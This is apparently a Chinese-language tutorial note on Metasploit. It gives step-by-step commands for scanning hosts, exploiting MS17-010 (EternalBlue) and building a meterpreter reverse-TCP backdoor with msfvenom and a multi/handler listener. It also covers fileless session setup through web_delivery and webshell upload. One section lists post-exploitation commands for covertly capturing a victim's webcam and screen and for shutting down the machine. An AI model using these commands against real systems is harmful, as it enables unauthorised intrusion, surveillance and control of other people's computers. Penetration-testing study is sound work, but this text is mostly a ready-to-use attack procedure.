0%

msf

msf控制目标电脑

首先安装kali-metasploit

modules-msf核心

  • auxiliary:辅助模块,辅助渗透(端口扫描,登陆密码爆破,漏洞验证等等)
  • exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。
  • payloads:攻击载荷,主要是攻击后在目标靶机执行的代码。
  • post:后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令。

    启动

    初始化数据库:msfdb init 使用的数据库不是mysql
    启动:msfconsole

    db_nmap

    db_nmap:nmap 扫描

-T[0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms
-sS:TCP SYN扫描
-sA:TCP ACK扫描
-sT:TCP 扫描
-A:全部
hosts:查看当前工作区所有主机,记录在数据库里面。
services:查看所有服务,记录在数据里面。

使用辅助模块

端口扫描:use auxiliary/scanner/postscan/使用TAB补全,跟也有nmap功能。
永恒之蓝漏洞:445端口(默认开启,无法关闭),window7。

检测ms17_010

search ms17_010
1、使用模块
use auxiliary/scanner/smb/smb_ms17_010
2、查看配置
查看设置:show options
3、设置地址
set rhosts 地址
4、运行
run或exploit

攻击漏洞-ms17-010

1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
同上。

  • 出现乱码,修改编码,chcp 65001。

    后渗透测试

    退出:backgroud
    升级:session -u 1

    常用命令

    show exploit-查看所有可用的渗透攻击程序代码
    show auxiliary-查看所有可用的辅助攻击工具
    show options-查看该模块可用选项
    show payloads-查看该模块适用的所有载荷代码
    show targets-查看该模块适用的攻击目标类型
    search-根据关键字搜索某模块
    info-显示某模块的详细信息
    use-使用某渗透攻击模块
    back-回退
    set/unset-设置模/禁用块中的某个参数
    setg/unsetg-设置/禁用适用于所有模块的全局参数
    save-将当前设置值保存下来,以便下次启动MSF终端时仍可使用。

    msfvenom

    由msfpayload和msfencode组合
    用于生成后门的软件,在目标机上执行后门,在本地监听上线。

    生成后门

    msfvenom -p windows/meterpreter/reverse_tcp lhost=地址 lport(未被占用的端口) -f exe>(-o)shell.exe

    监听

    p为payload f为格式
    use exploit/multi/handler
  • 详解:msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o xxxx.exe
    可帮助我们从大量的msf有效负载中创建需要的负载,合并到利用程序中。
    这里使用的payload要回连的主机和端口、输出格式都会整合到xxx.exe中。
    exploit/multi/handler模块是一个有效负载处理程序,它只在受损主机中执行的有效负载连接。(类似钓鱼)
    meterprter是msf后渗透利用工具。基于内存dll实现,能够通过创建一个新进程并调用注入的dll来让目标系统运行注入dll文件。
    在该模式下,攻击者与目标设备中meterpreter的通信是通过stager套接字实现的。
    *

    获取到meterpreter后能做什么?

    webcam_list:查看摄像头
    webcam_snap:快拍
    webcam_stream:通过摄像头开启视频

screenshot:获取屏幕截图
screenshare:实现监控桌面
shutdown:关闭目标机器
execute:在目标机执行文件,
execute -iso 重装系统
-H 不可见 -i 交互
拓展:获得shell
使用python,python2 -m SimpleHTTPServer
文件上传
upload /root/AUcONho0.jpeg “C:\aaa.jpeg”

msf攻击漏洞获取目标权限

从命令执行到meterpreter

方法一:通过web站点,使用无文件攻击利用执行。

当攻击者拥有部分受害者主机的控制权,但没拿到一个完整的shell,web_delivery就派上用场。
目的与作用:生成一条命令,与受害者主机快速建立一条session连接,有利于绕过,支持多种脚本,需要设置脚本。
操作:
use exploit/multi/script/web_delivery
show options
show targets
set target 数字
set lhost本机地址
set payload windows/meterpreter/reverse_tcp
run
复制命令,到网页提交。

方法二:通过web,上传webshell,到完全控制

百度查大佬发现漏洞。
成功上传webshell,使用msf上线监听。

方法三:攻击其他端口服务,拿到meterpreter(类似高级cmd)
-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道